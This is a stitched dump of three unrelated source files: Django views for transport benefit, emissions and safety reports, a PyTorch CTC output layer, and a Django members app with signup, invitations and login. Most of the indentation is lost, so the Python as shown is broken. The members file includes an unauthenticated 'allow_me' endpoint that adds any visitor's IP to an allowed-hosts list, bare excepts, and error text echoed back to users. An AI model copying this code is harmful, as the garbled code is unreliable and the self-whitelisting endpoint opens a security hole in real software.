if form.is_valid():
newregion = form.save()
newregion.save()
form = 0
return HttpResponseRedirect('/')
return render_to_response(
'region/add.html',{
'form':form
}
)
def main_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
acct_results = AccountingResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, tod='all', user_class='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
full_region_results_dict[result['year']] = {'year':result['year']}
full_region_results_dict[result['year']]['user_benefit'] = result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
full_region_acct_raw = acct_results.filter(region=1, tod='all', user_class='all').order_by('year').values()
for result in full_region_acct_raw:
if result['variable'] == 'rev':
full_region_results_dict[result['year']]['toll_revenue'] = result['difference']
elif result['variable'] == 'vmt':
full_region_results_dict[result['year']]['change_vmt'] = result['difference']
elif result['variable'] == 'vht':
full_region_results_dict[result['year']]['change_vht'] = result['difference']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = 0
#full_region_toll_npv = 0
for year in years:
full_region_benefit_npv += full_region_results_dict[year]['user_benefit'] / (1 + analysis.real_discount_rate)**(year - current_year)
#full_region_toll_npv += full_region_results_dict[year]['toll_revenue'] / (1 + analysis.real_discount_rate)**(year - current_year)
#if subregion calculate results and NPV
if analysis.region.id != 1:
subregion_benefits_raw = benefit_results.filter(region=analysis.region.id, tod='all', user_class='all').order_by('year').values()
subregion_results_dict = {}
for result in subregion_benefits_raw:
subregion_results_dict[result['year']] = {'year':result['year']}
subregion_results_dict[result['year']]['user_benefit'] = result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
subregion_acct_raw = acct_results.filter(region=analysis.region.id, tod='all', user_class='all').order_by('year').values()
for result in subregion_acct_raw:
if result['variable'] == 'rev':
subregion_results_dict[result['year']]['toll_revenue'] = result['difference']
elif result['variable'] == 'vmt':
subregion_results_dict[result['year']]['change_vmt'] = result['difference']
elif result['variable'] == 'vht':
subregion_results_dict[result['year']]['change_vht'] = result['difference']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = 0
#subregion_toll_npv = 0
for year in years:
subregion_benefit_npv += subregion_results_dict[year]['user_benefit'] / (1 + analysis.real_discount_rate)**(year - current_year)
#full_region_toll_npv += full_region_results_dict[year]['toll_revenue'] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
#get overrides
overrides=[]
defaults = {}
defaults_temp = Default.objects.all().values()
for i in defaults_temp:
defaults[i['field']] = i['value']
for i in Analysis._meta.fields:
if defaults.has_key(i.name):
if analysis.__dict__[i.name] != defaults[i.name]:
overrides.append({'parameter':i.name, 'default':defaults[i.name],'override': analysis.__dict__[i.name]})
return render_to_response(
'main_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv,
'overrides': overrides
}
)
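# Added sketch: every report below discounts a yearly benefit stream to
# present value with value / (1 + r)**(year - current_year); a hedged,
# stand-alone version of that pattern (npv is a hypothetical name):
def npv(values_by_year, rate, base_year):
    total = 0
    for year, value in values_by_year.items():
        total += value / (1 + rate) ** (year - base_year)
    return total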
def benefit_type_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, tod='all', user_class='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
full_region_results_dict[result['year']] = {'year':result['year']}
full_region_results_dict[result['year']]['time_benefit'] = result['time_benefit']
full_region_results_dict[result['year']]['operating_cost_benefit'] = result['operating_cost_benefit']
full_region_results_dict[result['year']]['toll_benefit'] = result['toll_benefit']
full_region_results_dict[result['year']]['fare_benefit'] = result['fare_benefit']
full_region_results_dict[result['year']]['parking_benefit'] = result['parking_benefit']
full_region_results_dict[result['year']]['unreliability_benefit'] = result['unreliability_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = {}
#full_region_toll_npv = 0
for year in years:
for key in full_region_results_dict[year].keys():
if not full_region_benefit_npv.has_key(key):
full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
full_region_results.append(full_region_benefit_npv)
if analysis.region.id != 1:
subregion_benefits_raw = benefit_results.filter(region=analysis.region.id, tod='all', user_class='all').order_by('year').values()
subregion_results_dict = {}
for result in subregion_benefits_raw:
subregion_results_dict[result['year']] = {'year':result['year']}
subregion_results_dict[result['year']]['time_benefit'] = result['time_benefit']
subregion_results_dict[result['year']]['operating_cost_benefit'] = result['operating_cost_benefit']
subregion_results_dict[result['year']]['toll_benefit'] = result['toll_benefit']
subregion_results_dict[result['year']]['fare_benefit'] = result['fare_benefit']
subregion_results_dict[result['year']]['parking_benefit'] = result['parking_benefit']
subregion_results_dict[result['year']]['unreliability_benefit'] = result['unreliability_benefit']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = {}
#subregion_toll_npv = 0
        for year in years:
            for key in subregion_results_dict[year].keys():
                if not subregion_benefit_npv.has_key(key):
                    subregion_benefit_npv[key] = subregion_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
                else:
                    subregion_benefit_npv[key] += subregion_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
return render_to_response(
'benefit_type_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv
}
)
def tod_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, user_class='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {'year':result['year']}
if not full_region_results_dict[result['year']].has_key(result['tod']):
full_region_results_dict[result['year']][result['tod']] = 0
full_region_results_dict[result['year']][result['tod']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = {}
#full_region_toll_npv = 0
for year in years:
for key in full_region_results_dict[year].keys():
if not full_region_benefit_npv.has_key(key):
full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
full_region_results.append(full_region_benefit_npv)
if analysis.region.id != 1:
subregion_benefits_raw = benefit_results.filter(region=analysis.region.id, user_class='all').order_by('year').values()
subregion_results_dict = {}
        for result in subregion_benefits_raw:
            if not subregion_results_dict.has_key(result['year']):
                subregion_results_dict[result['year']] = {'year':result['year']}
            if not subregion_results_dict[result['year']].has_key(result['tod']):
                subregion_results_dict[result['year']][result['tod']] = 0
            subregion_results_dict[result['year']][result['tod']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = {}
#subregion_toll_npv = 0
        for year in years:
            for key in subregion_results_dict[year].keys():
                if not subregion_benefit_npv.has_key(key):
                    subregion_benefit_npv[key] = subregion_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
                else:
                    subregion_benefit_npv[key] += subregion_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
return render_to_response(
'tod_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv
}
)
def user_class_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
acct_results = AccountingResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, tod='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {'year':result['year']}
if not full_region_results_dict[result['year']].has_key(result['user_class']):
full_region_results_dict[result['year']][result['user_class']] = 0
full_region_results_dict[result['year']][result['user_class']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = {}
#full_region_toll_npv = 0
for year in years:
for key in full_region_results_dict[year].keys():
if not full_region_benefit_npv.has_key(key):
full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
full_region_results.append(full_region_benefit_npv)
if analysis.region.id != 1:
subregion_results_raw = benefit_results.filter(region=analysis.region.id, tod='all').order_by('year').values()
subregion_results_dict = {}
for result in subregion_results_raw:
if not subregion_results_dict.has_key(result['year']):
subregion_results_dict[result['year']] = {'year':result['year']}
if not subregion_results_dict[result['year']].has_key(result['user_class']):
subregion_results_dict[result['year']][result['user_class']] = 0
subregion_results_dict[result['year']][result['user_class']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = {}
#subregion_toll_npv = 0
        for year in years:
            for key in subregion_results_dict[year].keys():
                if not subregion_benefit_npv.has_key(key):
                    subregion_benefit_npv[key] = subregion_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
                else:
                    subregion_benefit_npv[key] += subregion_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
return render_to_response(
'user_class_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv
}
)
def emissions_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
emission_results = EmissionResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = emission_results.order_by('year').values()
full_region_results_dict = {}
vehicle_types={'heavy_truck':'Heavy Truck', 'medium_truck':'Medium Truck', 'light_truck':'Light Truck', 'car':'Car'}
for result in full_region_benefits_raw:
pollutant_name = Pollutant.objects.get(pk=result['pollutant_id']).name
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {} #'year':result['year']
if not full_region_results_dict[result['year']].has_key(pollutant_name):
full_region_results_dict[result['year']][pollutant_name] = {'pollutant_name': pollutant_name, 'year': result['year']}
if not full_region_results_dict[result['year']][pollutant_name].has_key(result['vehicle_type']):
full_region_results_dict[result['year']][pollutant_name][result['vehicle_type']] = 0
full_region_results_dict[result['year']][pollutant_name][result['vehicle_type']] += result['difference']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
pollutants = full_region_results_dict[year].keys()
pollutants.sort()
for p in pollutants:
full_region_results.append(full_region_results_dict[year][p])
##calculate full region NPV
#full_region_benefit_npv = {}
##full_region_toll_npv = 0
#for year in years:
# for key in full_region_results_dict[year].keys():
# if not full_region_benefit_npv.has_key(key):
# full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
# else:
# full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
#
#full_region_results.append(full_region_benefit_npv)
return render_to_response(
'emissions_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
}
)
def safety_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
safety_results = AccidentResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = safety_results.order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {'year':result['year'], 'property_damage_only':0, 'injury':0, 'fatality': 0, 'total':0}
full_region_results_dict[result['year']]['property_damage_only'] += result['property_damage_only_benefit']
full_region_results_dict[result['year']]['injury'] += result['injury_benefit']
full_region_results_dict[result['year']]['fatality'] += result['fatality_benefit']
full_region_results_dict[result['year']]['total'] += result['fatality_benefit'] + result['injury_benefit'] + result['property_damage_only_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
##calculate full region NPV
#full_region_benefit_npv = {}
##full_region_toll_npv = 0
#for year in years:
# for key in full_region_results_dict[year].keys():
# if not full_region_benefit_npv.has_key(key):
# full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
# else:
# full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
#
#full_region_results.append(full_region_benefit_npv)
return render_to_response(
'safety_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
}
)
def benefits_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
benefit_results = BenefitResult.objects.filter(analysis=analysis.id).values()
if not len(benefit_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in BenefitResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in benefit_results:
row = []
for field in header:
if field == 'region':
row.append(Region.objects.get(id=result['region_id']).name)
else:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_benefit_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def accounting_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
accounting_results = AccountingResult.objects.filter(analysis=analysis.id).values()
if not len(accounting_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in AccountingResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in accounting_results:
row = []
for field in header:
if field == 'region':
row.append(Region.objects.get(id=result['region_id']).name)
else:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_accounting_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def safety_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
accidents_results = AccidentResult.objects.filter(analysis=analysis.id).values()
if not len(accidents_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in AccidentResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in accidents_results:
row = []
for field in header:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_safety_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def emissions_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
emissions_results = EmissionResult.objects.filter(analysis=analysis.id).values()
if not len(emissions_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in EmissionResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in emissions_results:
row = []
for field in header:
if field == 'pollutant':
row.append(Pollutant.objects.get(id=result['pollutant_id']).short_name)
else:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_emissions_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def restart(request):
"""
Clears the session and send them back home
"""
for key in request.session.keys():
request.session.__delitem__(key)
return HttpResponseRedirect('/')
|
[
"peter@thoughtspot.net"
] |
peter@thoughtspot.net
|
5baf1e3833e9e4c95ed0c4f8f8d4e52613083bd9
|
6c9f0e5996664dd9d92debcaefe438d9ed3b3ca6
|
/lib/networks/head/Rec_CTCHead.py
|
f3635e0215f4a2305db762c0b297de9dc9bd5d08
|
[
"MIT"
] |
permissive
|
yingbiaoluo/OCR_deployment
|
a978a60252c93c015c30cd2df44e268ff6149ea0
|
a2f4635d328e7bd484fb1c86da3ca79306d852a7
|
refs/heads/master
| 2023-04-06T10:33:39.590716
| 2021-04-08T08:39:01
| 2021-04-08T08:39:01
| 276,579,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
from torch import nn
import torch.nn.functional as F
class CTC(nn.Module):
def __init__(self, in_channels, n_class, **kwargs):
super().__init__()
self.n_class = n_class
self.fc = nn.Linear(in_channels, n_class)
def forward(self, x): # [batch, 141, 512]
x = self.fc(x) # [batch, 141, 6773]
x = F.log_softmax(x, dim=2)
return x
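# Added usage sketch (not part of the original file): shapes mirror the
# inline comments above; the batch size of 2 is arbitrary.
if __name__ == '__main__':
    import torch
    head = CTC(in_channels=512, n_class=6773)
    log_probs = head(torch.randn(2, 141, 512))
    print(log_probs.shape)  # torch.Size([2, 141, 6773])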
|
[
"yingbiao_luo@163.com"
] |
yingbiao_luo@163.com
|
dd8d15a25768c4147ce2c773a5b0dce3c3c5ba8c
|
4069734a3206e3def5dfa0f4205861a07583b451
|
/apps/members/views.py
|
e080f4310902d22f259d8d769e0df74e36bd08ce
|
[] |
no_license
|
shredz/Tool
|
93155000727694d032f2c840a42fa7cf0e96e7a5
|
814d0c55b856c0b8a51fa432def351301749d9df
|
refs/heads/master
| 2021-01-01T20:34:41.130137
| 2011-11-17T08:11:04
| 2011-11-17T08:11:04
| 2,786,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,360
|
py
|
from django.core.context_processors import csrf
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.contrib.auth import authenticate, login as userlogin, logout as userlogout
from django.forms.util import ErrorList
from django.shortcuts import render_to_response
from models import *
from forms import *
from apps.geo.models import *
from apps.core.models import *
from apps.spiffs.models import *
import datetime
import simplejson as json
from libs.utils import Response
import settings
def invitation_landing(request,invid,name):
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
first_name = ""
last_name = ""
parts = name.split("/")
if len(parts) == 1:
first_name = parts[0]
elif len(parts) > 1:
first_name = parts[0]
last_name = parts[1]
try:
i = Invitation.objects.get(curl=invid)
except:
raise Http404()
if i.prospect.first_name == first_name and i.prospect.last_name == last_name and (i.status == 'SENT' or i.status == 'VISITED'):
form = SignupForm(
{
"email" : i.prospect.email,
"first_name" : i.prospect.first_name,
"last_name" : i.prospect.last_name,
}
)
request.session["invitation"] = i.id
i.status = 'VISITED'
i.save()
return Response.render_form(request,'members/signup.html',form,errors=False)
else:
raise Http404()
#p = Prospect.objects.get(id=invid,first_name=first_name,last_name=last_name,source="Invitation")
return HttpResponse(i)
def fbinvite(request):
params = {"appId" : settings.CRED["FACEBOOK_APP_ID"] }
return render_to_response("members/fbinvite.html",params)
def invite(request):
if not request.user.is_authenticated():
return Response.send_to_login(request)
message = None
if request.method == 'POST':
form = InvitationForm(request.POST)
if form.is_valid():
p = Prospect(
email = form.cleaned_data['email'],
first_name = form.cleaned_data['first_name'],
last_name = form.cleaned_data['last_name'],
source = "Invitation"
)
p.save()
invitation = Invitation(
sender = User.instance(request.user),
prospect = p
)
invitation.create_curl()
invitation.save()
invitation.sendmail()
message = "An invitation has been sent to %s " % (p.email)
form = InvitationForm()
else:
pass
else:
form = InvitationForm()
return Response.render ("members/invite.html",{"form" : form , "appId" : settings.CRED["FACEBOOK_APP_ID"], "message" : message},request)
def profile(request):
if not request.user.is_authenticated():
return Response.send_to_login(request)
param = {}
try:
param['needs_username_correction'] = request.session['needs_username_correction']
except Exception,ex:
param['needs_username_correction'] = False
user = User.instance(request.user)
if request.method == 'POST':
form = ProfileForm(request.POST)
param['form'] = form
param['errors'] = True
if form.is_valid():
username = form.cleaned_data['username']
try:
u = User.objects.get(username=username)
if u.id != user.id:
form.errors['username'] = ErrorList( [u'Username already exists'])
except:
pass
email = form.cleaned_data['email']
try:
u = User.objects.get(email=email)
if u.id != user.id:
form.errors['email'] = ErrorList([u'Username with this email already exists'])
except:
pass
if not form.errors:
user.username = username
user.email = email
user.first_name = form.cleaned_data['first_name']
user.last_name = form.cleaned_data['last_name']
user.gender = form.cleaned_data['gender']
user.dob = form.cleaned_data['dob']
user.address.zipcode = form.cleaned_data['zipcode']
user.address.street_line_1 = form.cleaned_data['street_line_1']
user.address.street_line_2 = form.cleaned_data['street_line_2']
user.address.city = form.cleaned_data['city']
user.address.state = form.cleaned_data['state']
user.address.country = Country.objects.get(id=form.cleaned_data['country'])
user.address.save()
user.save()
try:
del request.session['needs_username_correction']
except:
pass
return HttpResponseRedirect('/members/')
else:
pass
else:
fn = user.first_name
if fn[0] == "(" and fn[-1] == ")":
fn = fn[2:-3]
ln = user.last_name
if ln[0] == "(" and ln[-1] == ")":
ln = ln[2:-3]
em = user.email
if em is None or em == "" or em == "None":
em = ""
un = user.username
if param['needs_username_correction']:
un = ""
param['form'] = ProfileForm(
{
"username" : un,
"email" : em,
"first_name" : fn,
"last_name" : ln,
"gender" : user.gender,
"dob" : user.dob,
"zipcode" : user.address.zipcode,
"street_line_1" : user.address.street_line_1,
"street_line_2" : user.address.street_line_2,
"city" : user.address.city,
"state" : user.address.state,
"country" : user.address.country.id,
}
)
param['errors'] = False
return Response.render ('members/profile.html',param,request)
def signup (request):
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
if request.method == 'POST':
form = SignupForm(request.POST)
if form.is_valid():
email1 = form.cleaned_data['email']
email2 = form.cleaned_data['email2']
if email1 != email2:
form.errors['email2'] = ErrorList([u'Emails do not match'])
try:
User.objects.get(email=email1)
form.errors['email'] = ErrorList([u'Username with this email already exists'])
except:
pass
username = form.cleaned_data['username']
try:
User.objects.get(username=username)
form.errors['username'] = ErrorList([u'Username already exists'])
except:
pass
password = form.cleaned_data['password']
if not form.errors:
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
gender = form.cleaned_data['gender']
dob = form.cleaned_data['dob']
country = Country.objects.get(id=1)
phonenumber = PhoneNumber(
countrycode = 0,
carriercode = 0,
number = 0,
)
phonenumber.save()
address = Address(
zipcode = "",
street_line_1 = "",
street_line_2 = "",
city = "",
state = "",
country = country,
location = country.location,
phonenumebr = phonenumber
)
address.save()
user = User (
username = username,
email = email1,
password = User.encode_pass(password),
first_name = first_name,
last_name = last_name,
dob = dob,
gender = gender,
address = address,
verification = User.create_verification("1"),
points = 0,
)
user.save()
reffered_by = False
try:
ref_id = request.session["f"]
reffered_by = User.objects.get(id=ref_id)
del request.session["f"]
except:
pass
invitation = False
try:
invitation = Invitation.objects.get(id=request.session["invitation"])
del request.session["invitation"]
except:
try:
invitation = Invitation.objects.get(prospect=Prospect.objects.get(email=user.email))
except:
pass
if invitation:
reffered_by = invitation.sender
invitation.status = "SIGNUP"
invitation.save()
if reffered_by:
ref = Referral(reffered_by=reffered_by,reffered_to=user)
ref.save()
user.send_verification_mail()
return HttpResponseRedirect('/members/')
else:
try:
request.session["f"] = request.GET["f"]
return HttpResponseRedirect("/members/signup/")
except:
pass
form = SignupForm()
return Response.render_form (request,'members/signup.html',form)
def dashboard(request):
if request.user.is_authenticated():
params = {}
params["user"] = User.instance(request.user)
#1- activities chart
params["activities"] = Activity.chart(params["user"],5)
#2- my deals [deals he is interested in]
params["mydeals"] = UserDeal.objects.filter(user=params["user"]).extra(order_by=['-added'])[:5]
#3- friends
params["friends"] = params["user"].friends
#4- recent activities
params["recent_points"] = Activity.recent(params["user"],5)
#-5 rewards
#-6 invite
params["iform"] = InvitationForm()
return Response.render("members/dashboard.html",params,request)
else:
return Response.send_to_login(request)
def index (request):
pass
def logout (request):
if request.user.is_authenticated():
userlogout(request)
return HttpResponseRedirect('/members/login/')
def login (request):
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is None:
form.errors["username"] = ErrorList([u'Invalid Username or Password'])
else:
s_user = User.objects.get(id=user.id)
if s_user.verification.verified == False:
form.errors["username"] = ErrorList([u'User must be verified first due to "%s"' % (s_user.verification.purpose)])
elif user.is_active:
userlogin(request,user)
return Response.send_to_destination(request)
else:
form.errors["username"] = ErrorList([u'Account Disabled'])
else:
form = LoginForm()
return Response.render_form (request,'members/login.html',form)
def settings_view(request):
if request.user.is_authenticated():
if request.method == 'POST':
for cid in request.POST:
try:
c = Config.objects.get(id=cid)
c.value = request.POST[cid]
c.save()
except:
pass
configList = User.instance(request.user).get_all_config()
clm = 1
total_clm = 2
table = []
row = {}
for title in configList:
row[title] = configList[title]
clm = clm + 1
if clm > total_clm:
table.append(row)
row = {}
table.append(row)
c = {"table":table}
c.update(csrf(request))
return Response.render("members/settings.html", c , request)
else:
return Response.send_to_login(request)
def verify(request,code):
#http://localhost/members/v/yxdRRWPx22Fr/
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
try:
user = User.objects.get(verification=Verification.objects.get(code=code))
if user.verification.purpose == "1" and user.verification.verified == False:
user.verification.verified = True
user.verification.verified_on = datetime.datetime.now()
user.verification.save()
user.is_active = True
user.is_staff = True
user.save()
try:
ref = Referral.objects.get(reffered_to=user)
inv = Invitation.objects.get(sender=ref.reffered_by)
inv.status = 'VERIFIED'
inv.save()
except:
pass
return Response.send_to_login(request,False)
except Exception,e:
return HttpResponse(e)
def like_deal(request,deal_id):
if request.user.is_authenticated():
user = User.instance(request.user)
try:
deal = Deal.objects.get(id=deal_id)
except Deal.DoesNotExist, dne:
return Response({"success":False,"message":"Deal does not exist"})
try:
ud = UserDeal.objects.get(deal=deal,user=user)
return Response.json({"success":False,"message":"Already in my deals","at":str(ud.added)})
except UserDeal.DoesNotExist,ex:
ud = UserDeal(deal=deal,user=user)
ud.save()
return Response.json({"success":True,"message":"success added to my deals", "id":ud.id})
else:
return Response.send_to_login(request)
def landed(request):
try:
response = HttpResponse("SUCCESS")
max_age = 365*24*60*60
expires = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=max_age), "%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie("location", request.GET["loc"], max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
response.set_cookie("email", request.GET["email"], max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
return response
except Exception, ex:
return HttpResponse("FAILURE" + str(ex.message))
## TEST CODE
## TODO TO BE REMOVED FROM PRODUCTION
def clear_loc(request):
response = HttpResponseRedirect("/members/")
max_age = 0
expires = datetime.datetime.strftime(datetime.datetime.utcnow(),"%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie("location", "", max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
response.set_cookie("email", "", max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
return response
def test (request):
return HttpResponse(request.COOKIES["location"])
def allow_me (request):
from apps.security.models import AllowedHosts
try:
AllowedHosts.objects.get(ip=request.META["REMOTE_ADDR"])
except AllowedHosts.DoesNotExist, dne:
AllowedHosts(ip=request.META["REMOTE_ADDR"]).save()
return Response.send_to("/")
|
[
"sharadpai111@gmail.com"
] |
sharadpai111@gmail.com
|
